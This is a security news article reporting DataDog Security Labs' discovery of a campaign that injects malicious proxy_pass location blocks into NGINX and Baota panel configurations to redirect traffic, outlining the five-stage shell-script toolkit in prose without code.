Hackers Compromise NGINX Servers to Redirect User Traffic

An ongoing malicious campaign has been discovered that targets NGINX servers, compromising them to reroute user traffic through the attacker’s infrastructure. This threat actor is utilizing a sophisticated method to hijack user connections and redirect them to attacker-controlled domains.

NGINX, an open-source software widely used for web traffic management, serves as an intermediary between users and servers. It facilitates web serving, load balancing, caching, and reverse proxying, making it a valuable tool for websites and online services.

Researchers at DataDog Security Labs uncovered this malicious campaign, which specifically targets NGINX installations and Baota hosting management panels. The campaign focuses on websites with Asian top-level domains (.in, .id, .pe, .bd, and .th) and government and educational sites (.edu and .gov).

The attackers manipulate existing NGINX configuration files by injecting malicious ‘location’ blocks that capture incoming requests on specific URL paths. They then modify these requests to include the original URL and redirect the traffic to their own domains using the ‘proxy_pass’ directive.

While the ‘proxy_pass’ directive is typically used for load balancing to enhance server performance, its misuse in this context bypasses security alerts, allowing the attackers to operate undetected. The attackers also ensure that request headers like ‘Host,’ ‘X-Real-IP,’ ‘User-Agent,’ and ‘Referer’ are preserved to mask the malicious traffic.

The attack employs a multi-stage toolkit to execute the NGINX configuration injections effectively. The toolkit progresses through five stages, each with a specific function aimed at compromising NGINX configurations and redirecting user traffic through attacker-controlled servers.

• Stage 1 – zx.sh: Initial controller script responsible for downloading and executing subsequent stages.
• Stage 2 – bt.sh: Targets NGINX configuration files managed by the Baota panel.
• Stage 3 – 4zdh.sh: Enumerates common NGINX configuration locations and prevents configuration corruption.
• Stage 4 – zdh.sh: Focuses on specific domain targets within NGINX configurations.
• Stage 5 – ok.sh: Scans compromised configurations and exfiltrates data to a command-and-control server.

These attacks are challenging to detect as they do not exploit vulnerabilities in NGINX but rather embed malicious instructions within its configuration files. This method allows the attackers to avoid detection as user traffic still reaches its intended destination, making the rerouting difficult to notice without specific monitoring in place.

Modern IT infrastructure moves faster than manual workflows can handle.

Discover how your team can reduce manual delays, improve reliability through automated response, and build intelligent workflows in the new Tines guide.

Get the guide